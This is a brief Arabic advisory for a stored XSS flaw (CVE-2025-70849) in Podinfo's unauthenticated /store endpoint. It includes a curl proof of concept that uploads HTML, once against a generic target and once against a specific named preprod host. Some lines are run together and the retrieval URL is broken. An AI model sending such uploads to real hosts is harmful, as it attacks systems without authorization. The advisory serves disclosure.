
CVE-2025-70849: ثغرة XSS مخزنة في Podinfo
تم تحديد ثغرة أمنية (CWE-79) في Podinfo، وهو تطبيق ويب لتوضيح الخدمات المصغرة لـ Kubernetes. تسمح ميزة /store للمستخدمين غير المصادق عليهم بتحميل محتوى HTML/JS عشوائي، مما يؤدي إلى XSS مخزنة.
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
الوصول إلى التجزئة المرتجعة: https:///store/